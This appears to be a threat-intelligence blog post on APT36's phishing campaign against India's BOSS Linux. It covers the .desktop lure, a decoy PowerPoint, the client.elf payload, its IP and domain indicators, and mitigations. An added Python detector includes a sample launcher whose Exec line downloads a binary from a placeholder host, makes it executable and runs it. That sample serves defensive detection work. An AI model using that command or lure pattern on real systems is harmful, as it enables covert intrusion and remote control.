
The Cyber Warfare between India and Pakistan rages on

  • Javier Conejo del Cerro
  • 11 Jul
  • 3 min read

In a new phase of regional cyber conflict, Pakistan-linked threat actor APT36 — also known as Transparent Tribe — has escalated its operations against Indian government targets. This time, the group has moved beyond Windows and Android platforms, setting its sights on a lesser-targeted but strategically critical environment: Linux.


Specifically, the group has engineered a campaign tailored for BOSS Linux (Bharat Operating System Solutions), the Indian government’s official Debian-based distribution. Used by defense personnel and various public institutions, BOSS Linux powers systems that manage internal communications, classified documents, and critical operational workflows.

These aren’t opportunistic or high-volume attacks aimed at casual users. The victims in this case include individuals and organizations at the heart of India’s national defense infrastructure — those with direct or privileged access to sensitive systems and strategic data. In targeting them, APT36 has made its intent clear: not disruption, but infiltration and long-term access. It’s a campaign that underscores the group’s geopolitical focus and its evolving technical capabilities.


Cyber Shelling


Initial access is achieved through a deceptive phishing email carrying an attachment titled Cyber-Security-Advisory.zip. Inside this compressed archive lies a seemingly benign .desktop file — a common shortcut format in Linux environments. But once clicked, the file unleashes a two-pronged attack designed to both distract and compromise.

First, it launches a PowerPoint presentation that appears legitimate, intended to convince the target that the attachment is safe. Simultaneously, and without the user’s awareness, the .desktop file deploys and runs a hidden Go-based ELF binary, saved locally under the name client.elf.

This binary, specifically compiled for Linux systems, connects to attacker-controlled infrastructure. The malware initiates communication with IP address 101.99.92.182 and the domain sorlastore.com, both of which have been previously attributed to APT36 operations. This connection enables the threat actor to establish remote access and maintain persistent control over the infected system.

The use of a Go-compiled ELF payload, combined with stealthy delivery and execution via Linux shortcuts, represents a notable evolution in APT36’s tactics. It also highlights the growing strategic importance of Linux as a target in state-sponsored espionage.


Cyber Bomb-Proof Shelter


  • Disable auto-execution of .desktop files in BOSS Linux and similar environments to prevent silent malware activation via shortcuts.

  • Enforce application allow-lists to ensure only trusted and signed software can be executed, blocking unauthorized binaries like client.elf.

  • Configure PowerPoint and similar viewers to open in read-only mode to reduce the effectiveness of visual decoys.

  • Redirect downloads from untrusted sources to no-execute partitions or sandboxed directories, limiting their ability to run without explicit permission.

  • Implement zero-trust segmentation across internal networks to isolate compromised endpoints and prevent lateral movement within sensitive infrastructure.

  • Monitor and restrict outbound traffic to known APT36 infrastructure such as IP 101.99.92.182 and the domain sorlastore.com.

  • Train users to recognize phishing lures that exploit themes like cybersecurity advisories, especially when ZIP files are involved.
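As an added example (not part of the original post), the following Python triage script supports the first two mitigations above by flagging .desktop launchers that show the delivery pattern described in this campaign: a shortcut named like a document whose Exec line opens a decoy viewer and, in the same command, fetches and runs a binary from a writable directory. The sample launcher, its URL and its paths are constructed placeholders, not indicators from the campaign.

```python
import configparser
import re

# Heuristics for the lure described above: a launcher named like a document whose
# Exec line opens a decoy viewer and also fetches and runs a binary from a writable path.
DOC_EXT = re.compile(r"\.(?:pptx?|pdf|docx?|xlsx?)$", re.I)
SHELL_WRAPPER = re.compile(r"^(?:/usr)?(?:/bin/)?(?:ba|z|da)?sh\s+-c\b")
CHAIN = re.compile(r";|&&|\|\||(?<!&)&(?!&)|\|")
FETCH = re.compile(r"\b(?:curl|wget)\b")
OPENER = re.compile(r"\b(?:xdg-open|libreoffice|soffice|evince|okular)\b")
TEMP_PATH = re.compile(r"(?:^|[\s\"'])(?:/tmp/|/dev/shm/|/var/tmp/|~/\.cache/)")
CHMOD_EXEC = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")

def triage_desktop(text: str) -> list[str]:
    """Return the heuristic findings for the contents of one .desktop file."""
    parser = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    parser.read_string(text)
    if not parser.has_section("Desktop Entry"):
        return ["not_a_desktop_entry"]
    entry = parser["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    findings = []
    # Type=Application but a document-like Name: the shortcut masquerades as a file.
    if entry.get("Type", "") == "Application" and DOC_EXT.search(entry.get("Name", "")):
        findings.append("document_masquerade")
    if SHELL_WRAPPER.match(exec_line):
        findings.append("shell_wrapper")
    # A viewer chained with other commands is the decoy-plus-payload shape.
    if OPENER.search(exec_line) and CHAIN.search(exec_line):
        findings.append("decoy_plus_command")
    if FETCH.search(exec_line):
        findings.append("network_fetch")
    if CHMOD_EXEC.search(exec_line):
        findings.append("chmod_exec")
    if TEMP_PATH.search(exec_line):
        findings.append("temp_path")
    return findings

def is_suspicious(text: str, threshold: int = 2) -> bool:
    """Two or more independent findings: quarantine the launcher instead of running it."""
    return len(triage_desktop(text)) >= threshold

# Constructed sample mirroring the described lure; the URL and paths are placeholders.
SAMPLE_DESKTOP = '''[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory.pptx
Exec=bash -c "xdg-open /tmp/Cyber-Security-Advisory.pptx & curl -s http://example.invalid/p -o /tmp/client.elf; chmod +x /tmp/client.elf; /tmp/client.elf"
Terminal=false
'''
```

Run `triage_desktop` over every .desktop file extracted from an inbound archive before the desktop environment is allowed to launch it; a launcher whose only finding is an ordinary `Exec=gedit %U` style command yields an empty list.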


Linking Back to the Battlefield


APT36’s recent campaign reflects a broader strategic trajectory. Since its emergence, the group has demonstrated a persistent focus on Indian targets. In 2016, Operation C-Major used Adobe Reader exploits and Android spyware to gather military credentials. In 2024, CapraRAT was deployed in disguise as popular mobile games and apps to steal personal and organizational data from Indian users. Each step in the group’s evolution shows a willingness to adapt, explore new platforms, and deepen its reach into the systems that matter most.

By targeting BOSS Linux, APT36 is not just expanding its toolkit — it is exploiting a blind spot in regional cybersecurity posture. The attack marks a shift in threat actor behavior, where even national operating systems are no longer off the table.

It begins with a ZIP file and a shortcut, but its real target is institutional trust, system integrity, and strategic control. For India and for other nations relying on Linux in critical contexts, the path forward lies not in assuming security, but in engineering it from the kernel up.

